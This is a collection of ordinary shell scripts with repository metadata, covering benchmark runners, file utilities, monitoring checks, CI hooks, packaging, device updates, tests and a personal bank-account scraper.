FILE="/home/anjushi/work/polybench/plain/BICG/result_1.txt"
make DEBUG=-D_DEBUG_1 OMP0 #OMP
make DAWN_1 #DawnCC
make DEBUG=-D_DEBUG_1 OAO #OAO
cmdcu1=`./OMP` #OMP
cmdcu2=`./DAWN_1.bin` #DawnCC_1
# OAO is run under nvprof to capture the GPU trace as CSV.
cmdcu3=`nvprof --csv --print-gpu-trace ./OAO.bin` #OAO
aaa1=${cmdcu1}
aaa2=${cmdcu2}
aaa3=${cmdcu3}
# Concatenate the three labelled outputs into the result file.
echo -e "OMP\n""$aaa1\n""DAWN\n""$aaa2\n""OAO\n""$aaa3" > $FILE
#
#
| true |
9d85d73916602b8fd8f8ff520eae33cd99fdbb9b
|
Shell
|
rkumar/cetus
|
/scripts/zip
|
UTF-8
| 537 | 4.375 | 4 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# This script zips the contents of selected_files.
# It prompts for a file name to create, defaulting to archive_<timestamp>.zip.
# If no files were selected, then the current file under cursor ($1) is zipped.
FILE=~/tmp/selected_files
TODAY=$(date +"%Y%m%d%H%M")
TARGET=archive_${TODAY}.zip
pwd
if [[ -f $FILE ]]; then
	wc -l "$FILE"
else
	# Pass data as printf arguments, never as the format string.
	printf 'Using %s. ' "$1"
	TARGET="$1.zip"
	echo "$1" > "$FILE"
fi
printf 'Enter zip file name (%s): ' "$TARGET"
read -r ANSWER
ANSWER=${ANSWER:-$TARGET}
# zip -@ reads the file list from stdin.
cat "$FILE" | zip "$ANSWER" -@
# Fix: the original printed the literal text "#{ANSWER}" (Ruby-style
# interpolation) instead of the chosen archive name.
printf 'Created %s\n' "$ANSWER"
| true |
c643bf6c9c79f22c7ba0184e4a463a3892be9e97
|
Shell
|
rohit-htc/CommandLine-Utilities
|
/prewrite
|
UTF-8
| 558 | 3.609375 | 4 |
[] |
no_license
|
#!/bin/bash
# prewrite: prepend text (or the contents of a file, or stdin) to a target
# file, parking the target's original contents in the X clipboard (xclip).
if [ $# -eq 1 ]
then
	# Single argument: prepend stdin ("-") to the target file.
	inputfile="-"
elif [ $# -eq 2 ]
then
	# Two arguments: the first is a source file if it exists, else
	# literal text to prepend.
	if [ -f "$1" ]
	then
		inputfile=$1
	else
		inputtext=$1
	fi
	shift;
else
	# Fix: the usage message belongs on stderr. The original wrote
	# "2>&1", which redirects stderr to stdout — ">&2" is intended.
	echo 'Usage: prewrite [text|filename] filename' >&2; exit 2
fi
# Stash the target in the clipboard, write the new head, append the stash.
if [ -z "$inputfile" ]
then
	cat "$1" | xclip -i && echo "$inputtext" > "$1" && xclip -o >> "$1"
else
	cat "$1" | xclip -i && cat "$inputfile" > "$1" && xclip -o >> "$1"
fi
| true |
e41370e373870012a20ddc37bd9154e009de0ed7
|
Shell
|
BoiseState/string-constraint-counting
|
/scripts/shell/set_class_path_var.sh
|
UTF-8
| 697 | 3.515625 | 4 |
[] |
no_license
|
#! /usr/bin/env bash
# Build a Java class path from the project's bin directory plus every
# .jar and .dylib under lib/, and echo it for other bash scripts to read.
# get directory of this script as current working directory
proj_root="$( cd "$( dirname "${BASH_SOURCE[0]}" )/.." && pwd )"
class_path="$proj_root/bin"
# for each jar file in lib directory
for jar_file in "$proj_root"/lib/*.jar
do
    # FIX: skip the literal "*.jar" pattern when nothing matches
    [ -e "$jar_file" ] || continue
    # add jar file to class path
    class_path="$class_path:$jar_file"
done
# for each dylib file in lib directory
for dylib_file in "$proj_root"/lib/*.dylib
do
    [ -e "$dylib_file" ] || continue
    # add dylib file to class path
    class_path="$class_path:$dylib_file"
done
# echo only the class path to be read by other bash scripts
echo "$class_path"
| true |
d68f3e7e2e889b82be2e4cce4d3c4093c637fdef
|
Shell
|
faust64/puppet
|
/modules/nagios/files/custom_plugins/check_etcd
|
UTF-8
| 1,411 | 3.6875 | 4 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# check_etcd - watch etcd cluster health
# 20180626 - smoro@redhat.com
# Nagios-style plugin: prints "ETCD-status <STATE><message>" and exits with
# the matching Nagios code (OK=0, WARNING=1, CRITICAL=2, UNKNOWN=3).
PRG=`basename $0`
OK=0
WARNING=1
CRITICAL=2
UNKNOWN=3
msg=": Nothing to report"
ret=OK
TMPFILE=/tmp/.$PRG.$$
# pull TLS material and the peer list from whichever etcd config exists
if test -f /etc/etcd/etcd.conf; then
	. /etc/etcd/etcd.conf
elif test -f /etc/etcd.env; then
	. /etc/etcd.env
fi
CLIENT_CA="$ETCD_PEER_TRUSTED_CA_FILE"
CLIENT_CERT="$ETCD_PEER_CERT_FILE"
CLIENT_KEY="$ETCD_PEER_KEY_FILE"
# turn "name=https://host:2380,..." into "https://host:2379,..." (client port)
ETCD_ENDPOINTS=$(echo $ETCD_INITIAL_CLUSTER | sed -e 's|^[^=]*=||' -e 's|,[^=]*=|,|g' | sed 's|:2380|:2379|g')
if test -z "$ETCD_ENDPOINTS"; then
	ret=UNKNOWN
	msg=": failed identifying advertise URL"
elif ! etcdctl --endpoints "$ETCD_ENDPOINTS" \
	"--cacert=$CLIENT_CA" \
	"--cert=$CLIENT_CERT" \
	"--key=$CLIENT_KEY" endpoint health >$TMPFILE 2>&1; then
	ret=UNKNOWN
	msg=": failed querying etcd"
elif ! grep -i ' is healthy' $TMPFILE >/dev/null 2>&1; then
	ret=CRITICAL
	msg=": cluster is not healthy"
else
	# compare reported member count against the configured cluster size
	nmembers=`awk 'BEG{c=0}/member/{c=c+1}END{print c}' $TMPFILE`
	nunhealthy=`awk 'BEG{c=0}/is unhealthy/{c=c+1}END{print c}' $TMPFILE`
	rmembers=`echo "$ETCD_INITIAL_CLUSTER" | awk -F, 'END{print NF}'`
	if test "$nmembers" -ne "$rmembers"; then
		ret=WARNING
		msg=": etcd members missing"
	elif test "$nunhealthy" -gt 0; then
		ret=WARNING
		msg=": has unhealthy members"
	fi
fi
rm -f $TMPFILE
echo "ETCD-status $ret$msg"
# map the symbolic state name to its numeric exit code
eval ret=\$$ret
exit $ret
| true |
4d8d6e83465defe2c3eecfa879dcc11bb6f75168
|
Shell
|
shahidv3/locust_docker
|
/run.sh
|
UTF-8
| 576 | 2.84375 | 3 |
[] |
no_license
|
#!/bin/bash
# Launch locust in standalone, master, or slave mode (per $LOCUST_MODE),
# assembling the command line from environment configuration.
LOCUST_CMD="/usr/local/bin/locust"
LOCUST_FILE_PATH="-f $LOCUST_FILE"
LOCUST_MODE=${LOCUST_MODE:-standalone}
if [ "$LOCUST_MODE" = "master" ]; then
    # FIX: original passed a bare "host=$TARGET_URL"; locust expects --host
    # (the slave branch below already used --host).
    LOCUST_FILE_PATH="$LOCUST_FILE_PATH --csv=reports --host=$TARGET_URL --master --no-web -c $USERS -r $HATCH_RATE -t $RUN_TIME --expect-slaves $SLAVES"
elif [ "$LOCUST_MODE" = "slave" ]; then
    LOCUST_FILE_PATH="$LOCUST_FILE_PATH --host=$TARGET_URL --slave --master-host=$MASTER_HOST"
fi
echo "$LOCUST_CMD $LOCUST_FILE_PATH"
# intentionally unquoted: $LOCUST_FILE_PATH holds multiple flags
$LOCUST_CMD $LOCUST_FILE_PATH
| true |
113a44c2a836836001e20a5c623e390fee24fa7b
|
Shell
|
rjeschmi/conda-ice40-builds
|
/.travis/after_success.sh
|
UTF-8
| 886 | 3.28125 | 3 |
[] |
no_license
|
#!/bin/bash
# Travis after_success hook: list the built conda package's contents,
# upload it to Anaconda Cloud on master push builds, then dump the tail of
# the build log. Helpers (start_section/end_section/colors) come from
# .travis/common.sh.
source .travis/common.sh
set -e

# Close the after_success fold travis has created already.
travis_fold end after_success

if [ -z "$SKIP_BUILD" ]; then
	start_section "package.contents" "${GREEN}Package contents...${NC}"
	tar -jtf $CONDA_OUT | sort
	end_section "package.contents"
fi

# upload only for pushes to master that are not cron jobs or pull requests
if [ x$TRAVIS_BRANCH = x"master" -a x$TRAVIS_EVENT_TYPE != x"cron" -a x$TRAVIS_PULL_REQUEST == xfalse -a -z "$SKIP_BUILD" ]; then
	$SPACER
	start_section "package.upload" "${GREEN}Package uploading...${NC}"
	anaconda -t $ANACONDA_TOKEN upload --user $ANACONDA_USER --label main $CONDA_OUT
	end_section "package.upload"
fi

$SPACER

if [ -z "$SKIP_BUILD" ]; then
	start_section "success.tail" "${GREEN}Success output...${NC}"
	echo "Log is $(wc -l /tmp/output.log) lines long."
	echo "Displaying last 1000 lines"
	echo
	tail -n 1000 /tmp/output.log
	end_section "success.tail"
fi
| true |
766c75d641ec1cc0e022a759a8e0128004b9216d
|
Shell
|
petronny/aur3-mirror
|
/yoono/PKGBUILD
|
UTF-8
| 1,230 | 2.734375 | 3 |
[] |
no_license
|
# Maintainer: grimsock <lord.grimsock at gmail dot com>
# Contributor: Dongsheng Cai <dongsheng at moodle {dot} com>
# Contributor: Mcder3 <mcder3[at]gmail[dot]com>
# Arch Linux PKGBUILD for the Yoono desktop social/IM client.
pkgname=yoono
_altpkgname=yoono-desktop
pkgver=1.8.44
pkgrel=1
pkgdesc="Allows you to connect to all your social networks and IM services"
arch=('i686' 'x86_64')
url="http://www.yoono.com"
license=('custom:yoono')
# runtime dependency: native xulrunner on i686, 32-bit compat build on x86_64
if [ "$CARCH" = "i686" ]; then
	depends=('xulrunner')
elif [ "$CARCH" = "x86_64" ]; then
	depends=('lib32-xulrunner')
fi
source=("http://cdn.yoono.com/desktop/${_altpkgname}-${pkgver}.tar.bz2"
	"yoono"
	"yoono.desktop")
md5sums=('7581c3a52ac9292883acae7fa11eea7f'
	'c4ef2d69caac5b00d69cbfe6cb27a495'
	'723b2875156c48d89a5680b1b212af40')
# Copy the unpacked upstream tree into /opt and install icon, desktop
# entry, and launcher script.
package() {
	cd "${srcdir}"
	mkdir -p "${pkgdir}/opt/${pkgname}"
	cp -r "./${_altpkgname}/"* "${pkgdir}/opt/${pkgname}"
	cd "${pkgdir}/opt/${pkgname}"
	# install icon, desktop files
	install -Dm644 "${srcdir}/${_altpkgname}/chrome/branding/content/icon64.png" "${pkgdir}/usr/share/pixmaps/yoono.png"
	install -Dm644 "${srcdir}/${pkgname}.desktop" "${pkgdir}/usr/share/applications/${pkgname}.desktop"
	install -Dm755 "${srcdir}/${pkgname}" "${pkgdir}/usr/bin/${pkgname}"
}
| true |
4b5b5ce254a44899b4d0398bcfb43cea400422e0
|
Shell
|
eusougz/shellscripts
|
/aula9-scripts-estrutura-repeticao/palindrome.sh
|
UTF-8
| 179 | 3.234375 | 3 |
[] |
no_license
|
#!/bin/bash
# Read lines from stdin; for each line keep only lowercase letters and
# print "Yes" if the result reads the same reversed, "No" otherwise.
# NOTE(review): uppercase letters are stripped, not lowercased — confirm
# that inputs are expected to be lowercase.
while IFS= read -r line; do
    letters=$(printf '%s\n' "$line" | sed "s/[^a-z]//g")
    reversed=$(printf '%s\n' "$letters" | rev)
    if [ "$letters" = "$reversed" ]; then
        echo Yes
    else
        echo No
    fi
done
| true |
4bf849f5bc3ccd05a51c71cb496dc5813d30baf4
|
Shell
|
christophercaburog/Centos-Dotfiles-Final
|
/dotfiles/bash_functions
|
UTF-8
| 7,349 | 3.890625 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Personal bash helper library: colored status printers, an
# execute-and-report wrapper, and bulk git/GitHub/Bitbucket/Homebrew
# utilities. Intended to be sourced from a shell rc file.

# UTF-8 byte escapes (for echo -e) of the glyphs used by the printers below.
UTF_8_HEAVY_BALLOT_X='\xe2\x9c\x98'
UTF_8_HEAVY_CHECK_MARK='\xe2\x9c\x94'
UTF_8_HEAVY_WARNING_SIGN='\xe2\x9a\xa0'
UTF_8_INFORMATION_SOURCE='\xe2\x84\xb9'
UTF_8_BLACK_RIGHT_POINTING_INDEX='\xE2\x98\x9B'

# Print a table of every foreground/background ANSI color combination.
function print_available_terminal_colors {
	T='gYw' # The test text
	echo -e "\n 40m 41m 42m 43m\
 44m 45m 46m 47m";
	for FGs in ' m' ' 1m' ' 30m' '1;30m' ' 31m' '1;31m' ' 32m' \
		'1;32m' ' 33m' '1;33m' ' 34m' '1;34m' ' 35m' '1;35m' \
		' 36m' '1;36m' ' 37m' '1;37m';
	do FG=${FGs// /}
		echo -en " $FGs \033[$FG $T "
		for BG in 40m 41m 42m 43m 44m 45m 46m 47m;
		do echo -en "$EINS \033[$FG\033[$BG $T \033[0m";
		done
		echo;
	done
	echo
}
# Status-line printers: each one prefixes its message with a colored glyph.
print_task() {
  echo -e "${UTF_8_BLACK_RIGHT_POINTING_INDEX} $1"
}

# Green check mark (no message).
print_success() {
  echo -e "\033[01;32m ${UTF_8_HEAVY_CHECK_MARK} \033[00m"
}

# Blue informational message.
print_info() {
  echo -e "\033[01;34m ${UTF_8_INFORMATION_SOURCE} $*\033[00m"
}

# Yellow warning message.
print_warning() {
  echo -e "\033[01;33m ${UTF_8_HEAVY_WARNING_SIGN} $*\033[00m"
}

# Red error message.
print_error() {
  echo -e "\033[01;31m ${UTF_8_HEAVY_BALLOT_X} $*\033[00m"
}
# Run a command string, printing BANNER plus a check mark on success; on
# failure report the captured stderr through print_error or print_warning.
#   $1 = command (word-split when executed — no embedded quoting)
#   $2 = banner text (defaults to the command itself)
#   $3 = reporter: "error" (default) or "warning"
# Returns the command's exit status.
function execute_command {
	usage="execute-command CMD [BANNER] [error/warning]"
	[ -z "$1" ] && echo "$usage" && return
	cmd=$1
	banner=${2-$1}
	reporter=${3-error}
	[ "$reporter" != "error" ] \
		&& [ "$reporter" != "warning" ] \
		&& echo "$usage" \
		&& return
	echo -n "${banner} ..."
	# capture stderr only; stdout is discarded
	error=$($cmd 2>&1 >/dev/null)
	status=$?
	if [ $status -eq 0 ]; then
		print_success
	else
		# dynamic dispatch to print_error / print_warning
		print_"${reporter}" "$error"
	fi
	return $status
}
# Usage example: clone_github_user_repos cnadiminti
# Clone every public repository of a GitHub user (default: cnadiminti)
# into a directory named after the user, paging through the GitHub API.
function clone_github_user_repos {
	user=${1-cnadiminti}
	execute_command "mkdir -p $user"
	# last page number parsed out of the API's Link response header
	last_page=$(curl -Iks https://api.github.com/orgs/"$user"/repos | grep Link: | awk -F'=|>' '{ print $5 }')
	for p in $(seq 1 "$last_page"); do
		print_task "Working on page# $p"
		for repo in $(curl -ks https://api.github.com/users/"$user"/repos?page="$p" | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| puts repo["clone_url"] }'); do
			execute_command "git -C $user clone -q $repo"
		done
	done
}

# Usage example: clone_github_org_repos sensu
# Same as clone_github_user_repos, but for a GitHub organization; the
# organization name is required.
function clone_github_org_repos {
	org=$1
	if [ -z "$org" ] ; then
		print_info 'Usage: clone_github_org_repos [ORG-NAME]'
		return
	fi
	execute_command "mkdir -p $org"
	last_page=$(curl -Iks https://api.github.com/orgs/"$org"/repos | grep Link: | awk -F'=|>' '{ print $5 }')
	for p in $(seq 1 "$last_page"); do
		print_task "Working on page# $p"
		for repo in $(curl -ks https://api.github.com/orgs/"$org"/repos?page="$p" | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| puts repo["clone_url"] }'); do
			execute_command "git -C $org clone -q $repo"
		done
	done
}
# For every directory under $1 that is a git repository, run "git fetch".
function git_project_fetch {
  local entry
  # quote the root so paths with spaces glob correctly
  for entry in "$1"/*; do
    print_task "$entry"
    if execute_command "[ -d $entry ]" " Is Directory?" "warning"; then
      if execute_command "git -C $entry rev-parse" " Is git repo?" "warning"; then
        execute_command "git -C $entry fetch" " Fetching"
      fi
    fi
  done
}

# For every directory under $1 that is a git repository, run "git pull".
function git_project_pull {
  local entry
  for entry in "$1"/*; do
    print_task "$entry"
    if execute_command "[ -d $entry ]" " Is Directory?" "warning"; then
      if execute_command "git -C $entry rev-parse" " Is git repo?" "warning"; then
        execute_command "git -C $entry pull" " Pulling"
      fi
    fi
  done
}
# Clone every repository of a Bitbucket Server project into a directory
# named after the project. Prompts for host/user/password if the
# BITBUCKET_* environment variables are not already set.
function clone_bitbucket_proj {
	proj=$1
	if [ -z "$proj" ] ; then
		print_info 'Usage: clone_bitbucket_proj [PROJECT-NAME]'
		return
	fi
	if [ -z "$BITBUCKET_HOST" ]; then
		echo -n "Please enter your Bitbucket Host: "
		read -r BITBUCKET_HOST
	fi
	if [ -z "$BITBUCKET_USER" ]; then
		echo -n "Please enter your Bitbucket Username: "
		read -r BITBUCKET_USER
	fi
	if [ -z "$BITBUCKET_PASS" ]; then
		echo -n "Please enter your Bitbucket Password: "
		read -sr BITBUCKET_PASS
		echo ''
	fi
	execute_command "mkdir -p $proj"
	# page through the repo list until the API reports the last page
	isLastPage=false
	start=0
	while [ "$isLastPage" == "false" ]; do
		json=$(curl -sk -u "${BITBUCKET_USER}:${BITBUCKET_PASS}" -H "Content-Type: application/json" "${BITBUCKET_HOST}/rest/api/1.0/projects/$proj/repos?start=${start}")
		isLastPage=$(echo "$json" | ruby -rubygems -e 'require "json"; puts JSON.load(STDIN.read)["isLastPage"]')
		start=$(echo "$json" | ruby -rubygems -e 'require "json"; puts JSON.load(STDIN.read)["nextPageStart"]')
		for repo in $(echo "$json" | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read)["values"].each { |repo| repo["links"]["clone"].each { |url| puts url["href"] if (url["name"] = "ssh" and url["href"].match('/^ssh/')) }}'); do
			execute_command "git -C $proj clone -q $repo"
		done
	done
}

# Probe the current machine and export SYS_* environment variables
# describing OS name, release, distribution, and hardware. Pass -v to
# also print every exported value.
function system_info {
	export SYS_OS_NAME=$(uname -s)
	export SYS_OS_RELEASE=$(uname -r)
	export SYS_OS_VERSION=$(uname -v)
	export SYS_HARDWARE_NAME=$(uname -m)
	export SYS_PROCESSOR_TYPE=$(uname -p)
	if [ "${SYS_OS_NAME}" = "Linux" ] ; then
		# classify the distro family by its release file
		if [ -f /etc/redhat-release ]; then
			export SYS_OS_TYPE=redhat
		elif [ -f /etc/system-release ]; then
			export SYS_OS_TYPE=redhat
		elif [ -f /etc/debian_version ]; then
			export SYS_OS_TYPE=debian
		elif [ -f /etc/SuSE-release ]; then
			export SYS_OS_TYPE=suse
		fi
		if [ -r /etc/os-release ] ; then
			# shellcheck disable=SC1091
			export SYS_OS_DIST_NAME=$(source /etc/os-release && echo "$NAME")
			# shellcheck disable=SC1091
			export SYS_OS_DIST_ID=$(source /etc/os-release && echo "$ID")
			# shellcheck disable=SC1091
			export SYS_OS_DIST_VERSION=$(source /etc/os-release && echo "$VERSION_ID")
		fi
	elif [ "${SYS_OS_NAME}" = "Darwin" ]; then
		export SYS_OS_DIST_ID=$(sw_vers | grep ProductName | sed 's/ProductName:[ ]*//' | xargs)
		export SYS_OS_DIST_VERSION=$(sw_vers | grep ProductVersion | sed 's/ProductVersion:[ ]*//'| xargs)
	fi
	if [ "$1" = "-v" ]; then
		echo "SYS_OS_NAME=$SYS_OS_NAME"
		echo "SYS_OS_TYPE=$SYS_OS_TYPE"
		echo "SYS_OS_RELEASE=$SYS_OS_RELEASE"
		echo "SYS_OS_VERSION=$SYS_OS_VERSION"
		echo "SYS_HARDWARE_NAME=$SYS_HARDWARE_NAME"
		echo "SYS_PROCESSOR_TYPE=$SYS_PROCESSOR_TYPE"
		echo "SYS_OS_DIST_NAME=$SYS_OS_DIST_NAME"
		echo "SYS_OS_DIST_ID=$SYS_OS_DIST_ID"
		echo "SYS_OS_DIST_VERSION=$SYS_OS_DIST_VERSION"
	fi
}
# Delete all the images with <none> tag
function docker_rmi_none {
	local img
	for img in $(docker images | awk '/<none>/ { print $3 }'); do
		echo "$img"
		docker rmi "$img"
	done
}

# Aggressively clean Homebrew: drop caches, uninstall every installed
# formula and cask, then prune dead symlinks.
function brew_cleanup {
	brew cleanup
	brew cask cleanup
	# FIX: quoting "$(brew list)" handed brew ONE giant package name and
	# always failed; feed each package as its own argument instead.
	brew list | xargs brew uninstall || true
	brew cask list | xargs brew cask uninstall || true
	brew prune
}
| true |
729bc00b83f575ce4ef7b6afb55e7149714a1e83
|
Shell
|
Nifury/onnxruntime
|
/tools/ci_build/github/linux/docker/scripts/manylinux/install_centos.sh
|
UTF-8
| 382 | 2.90625 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
# Extract the OS major version (e.g. "7") from /etc/redhat-release.
os_major_version=$(tr -dc '0-9.' < /etc/redhat-release | cut -d \. -f1)
echo "installing for os major version : $os_major_version"
yum install -y which gdb redhat-lsb-core expat-devel tar unzip zlib-devel make libunwind bzip2 bzip2-devel
# Install Java
# Install automatic documentation generation dependencies
yum install -y java-11-openjdk-devel graphviz
| true |
7e26d2ba9749d4f4d2807c44a979f58c646d9793
|
Shell
|
hhoegelo/C15
|
/build-tools/create-c15-update/update_scripts/bbb_update.sh
|
UTF-8
| 2,568 | 3.9375 | 4 |
[] |
no_license
|
#!/bin/sh
#
# Author: Anton Schmied
# version : 2.0
#
# ----------- install a BBB Updates from USB-Stick ---------
#
# This script will transfer the /preset-manager/* and settings.xml to the ePC
# and update the BBB excluding the /update directory
#
EPC_IP=$1
BBB_IP=$2

# Append an error message to the update log and abort with the given code.
#   $1 = message, $2 = exit code
report_and_quit(){
	printf "$1" >> /update/errors.log
	exit $2
}

# Run a command as root on the ePC via sshpass; propagates ssh's status.
executeAsRoot() {
	echo "sscl" | /update/utilities/sshpass -p 'sscl' ssh -o ConnectionAttempts=1 -o ConnectTimeout=1 -o StrictHostKeyChecking=no sscl@$EPC_IP \
	"sudo -S /bin/bash -c '$1' 1>&2 > /dev/null"
	return $?
}

# Succeed only if settings exist, the ePC is reachable over ssh, and its
# /persistent partition is mounted.
check_preconditions(){
	if [ -e /settings.xml ] &&
	[ ! -z "$EPC_IP" ] &&
	ping -c1 $EPC_IP 1>&2 > /dev/null &&
	executeAsRoot "exit" &&
	executeAsRoot "mountpoint -q /persistent"; then
	return 0
	fi
	return 1
}

# Migrate presets, settings, and calibration data from the BBB to the
# ePC's /persistent storage, deleting the local copies on success.
move_files(){
	if ! check_preconditions; then
		return 1
	fi
	executeAsRoot "systemctl stop playground"
	if [ -d /internalstorage/preset-manager ] && [ "$(ls -A /internalstorage/preset-manager/)" ]; then
		executeAsRoot "scp -r root@$BBB_IP:/internalstorage/preset-manager/ /persistent" \
		&& rm -rf /internalstorage/preset-manager/* \
		&& rm -rf /internalstorage/preset-manager
		if [ $? -ne 0 ]; then report_and_quit "E55 BBB update: Moving presets to ePC failed ..." "55"; fi
	fi
	if [ -e /settings.xml ]; then
		executeAsRoot "scp root@$BBB_IP:/settings.xml /persistent/settings.xml" \
		&& rm /settings.xml
		if [ $? -ne 0 ]; then report_and_quit "E56 BBB update: Moving Settings to ePC failed ..." "56"; fi
	fi
	if [ -d /internalstorage/calibration ] && [ "$(ls -A /internalstorage/calibration/)" ]; then
		executeAsRoot "scp -r root@$BBB_IP:/internalstorage/calibration/ /persistent" \
		&& rm -rf /internalstorage/calibration/* \
		&& rm -rf /internalstorage/calibration
		if [ $? -ne 0 ]; then report_and_quit "E57 BBB update: Moving calibration settings to ePC failed ..." "57"; fi
	fi
	return 0
}

# Unpack the new rootfs and rsync it over / (protecting /update and the
# hostapd config), then restore ownership of /update.
update(){
	mkdir /update/BBB/rootfs \
	&& gzip -dc /update/BBB/rootfs.tar.gz | tar -C /update/BBB/rootfs -xf - \
	&& LD_LIBRARY_PATH=/update/utilities /update/utilities/rsync -cax --exclude 'etc/hostapd.conf' -f 'P update/' --delete /update/BBB/rootfs/ / \
	&& chown -R root.root /update
	if [ $? -ne 0 ]; then report_and_quit "E58 BBB update: Syncing rootfs failed ..." "58"; fi
	rm -rf /update/BBB/rootfs/*
	rm -rf /update/BBB/rootfs
}

main() {
	move_files
	update
	return 0
}

main
| true |
15828e6c2438a7e6fe3d0b73759825861ecf49fe
|
Shell
|
uda446/rodod-soa_aia-brmconnectionpoolreset
|
/BRMConnectionPoolReset.sh
|
UTF-8
| 984 | 2.59375 | 3 |
[] |
no_license
|
#!/bin/bash
#############################################################################################
# File Description: Script to invoke BRMConnectionPoolReset.py                              #
# File Name: BRMConnectionPoolReset.py                                                      #
# Author: Wiacek, Tomasz                                    date: 2020-09-22                #
# Version History:                                                                          #
# v01 - 2020-09-22 - Initial Script creation                                                #
#############################################################################################
# WebLogic admin URL on this host; $1/$2 are forwarded to the WLST script.
URL=t3://$(hostname):7001
# faster entropy source for the JVM; silence WLST offline logging
export CONFIG_JVM_ARGS="-Djava.security.egd=file:/dev/./urandom -Dwlst.offline.log=disable"
WLST_HOME=/opt/aia/Middleware_WLS12C/oracle_common/common/bin
PY_HOME=/opt/aia/OperationalScript/BRMConnectionPoolReset
#run wlst script
$WLST_HOME/wlst.sh $PY_HOME/BRMConnectionPoolReset.py $URL $1 $2
| true |
08bd4d650a9fa432a9409b3eeec35bf298565aaa
|
Shell
|
milanowen/ribsnetwork
|
/ddns/cloudxns.sh
|
UTF-8
| 1,184 | 3.828125 | 4 |
[] |
no_license
|
#!/bin/sh
# CloudXNS dynamic-DNS updater.
# Usage: cloudxns.sh API_KEY SECRET_KEY DOMAIN [HOST]
# Arguments may also be supplied via the ApiKey/SecretKey/Domain/Host
# environment variables.
set -e
# quote positional tests: bare [ $1 ] breaks under set -e on spaced args
if [ -n "${1:-}" ]; then
    ApiKey=$1
fi
if [ -n "${2:-}" ]; then
    SecretKey=$2
fi
if [ -n "${3:-}" ]; then
    Domain=$3
fi
if [ -z "$ApiKey" ] || [ -z "$SecretKey" ] || [ -z "$Domain" ]; then
    echo "参数缺失"
    exit 1
fi
if [ -n "${4:-}" ]; then
    Host=$4
fi
if [ -z "$Host" ]; then
    Host="@"
fi
# request timestamp, part of the API signature
ApiRequestDate=$(date)
# Compute the CloudXNS API-HMAC header value: the MD5 hex digest of
# apikey + url + body + request-date + secret-key.
#   $1 = request URL, $2 = request body
getSignature() {
    local digest
    digest=$(printf '%s' "$ApiKey$1$2$ApiRequestDate$SecretKey" | openssl md5 | awk '{print $2}')
    echo "$digest"
}
# POST $1 (JSON body) to the CloudXNS ddns endpoint with the signed
# headers; prints the raw JSON response to stdout.
sendRequest() {
    local sig=$(getSignature "https://www.cloudxns.net/api2/ddns" $1)
    local result=$(wget -qO- --no-check-certificate --header="API-KEY: $ApiKey" --header="API-REQUEST-DATE: $ApiRequestDate" --header="API-HMAC: $sig" --post-data "$1" "https://www.cloudxns.net/api2/ddns")
    echo $result
}

# Ask CloudXNS to point $Host.$Domain at the caller's current IP; report
# success (API code "1") or the API error message and exit non-zero.
# User-facing messages are intentionally in Chinese.
updateDDNS() {
    echo "更新 $Host.$Domain 的 IP..."
    local result=$(sendRequest "{\"domain\":\"$Host.$Domain.\"}")
    local code=$(echo $result | jq -r '.code')
    if [ "$code" = "1" ]; then
        echo "更新完成." >&2
    else
        local message=$(echo $result | jq -r '.message')
        echo "更新出错. 错误提示: $message" >&2
        exit 1
    fi
}

updateDDNS
| true |
4a588678b7a5de3fd18fea54f04c359525d423c8
|
Shell
|
jerrylee1697/rshell
|
/tests/test_test.sh
|
UTF-8
| 585 | 2.59375 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# Run rshell against four canned input files, capturing its output for
# later comparison. Case 4 feeds an invalid parameter on purpose.
cd ../bin/ || exit 1

# run_case LABEL N: announce LABEL, feed testN.dat to rshell, save testNo.dat
run_case() {
    echo "$1"
    ./rshell < "../tests/test_test/test$2.dat" > "../tests/test_test/test$2o.dat"
}

run_case "Case 1: No Parameter" 1
run_case "Case 2: Single Parameter" 2
run_case "Case 3: More than 1 Parameters" 3
run_case "Case 4: Invalid Parameter" 4
| true |
42eccd6d155c4d59da7fdce599ce9e32bd0fd22c
|
Shell
|
tlj1899/cathaycheck
|
/banking.sh
|
UTF-8
| 2,055 | 3.0625 | 3 |
[
"MIT"
] |
permissive
|
#echo "Credentials into ID/PIN/CODE"
# Scripted login to mybank.com.tw: walk the login flow page by page with a
# shared cookie jar, download the account data, log out, then hand
# url5.html to parsing.py. Credentials come from the $ID/$PIN/$CODE
# environment variables.
URL1=https://www.mybank.com.tw/pweb/
URL2=https://www.mybank.com.tw/pweb/login.asp
URL3=https://www.mybank.com.tw/pweb/main_menu.asp
URL4=https://www.mybank.com.tw/pweb/main_menu_bottom.asp
URL5=https://www.mybank.com.tw/pweb/C01.asp
URL6=https://www.mybank.com.tw/pweb/C01_Download.asp
URL_LOGOUT=https://www.mybank.com.tw/pweb/logout.asp
OUT1=url1.html
OUT2=url2.html
OUT3=url3.html
OUT4=url4.html
OUT6=url6.html

# start each session with a fresh cookie jar
if [ -f cookies.txt ]; then
    rm cookies.txt
fi

USERAGENT="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17"

# fetch REFERER URL OUTFILE [extra curl args...]
# One step of the session: shared curl flags plus the cookie jar. An empty
# REFERER omits the header (used only for the first request).
fetch() {
    referer=$1 url=$2 outfile=$3
    shift 3
    curl \
        -ss \
        --location \
        --user-agent "${USERAGENT}" \
        -b cookies.txt \
        -c cookies.txt \
        ${referer:+--referer "$referer"} \
        "$@" "$url" > "$outfile"
}

# main page to get cookie
fetch "" "$URL1" "$OUT1"
# logging in
fetch "$URL1" "$URL2" "$OUT2" --data "logon_name=${ID}&logon_pwd=${PIN}&nick_name=${CODE}&ChipCard=N&ComeFrom=MyBank&Fun=&wid=&wp_kind=&FundID=&FundType=&ClickFlag=&capslock_status=&kbdid="
# menu page
fetch "$URL2" "$URL3" "$OUT3"
# menu side
fetch "$URL3" "$URL4" "$OUT4"
# actual data
fetch "$URL4" "$URL5" url5.html
# data page other
fetch "$URL5" "$URL6" "$OUT6"
# logging out
fetch "$URL6" "$URL_LOGOUT" /dev/null

./parsing.py url5.html
| true |
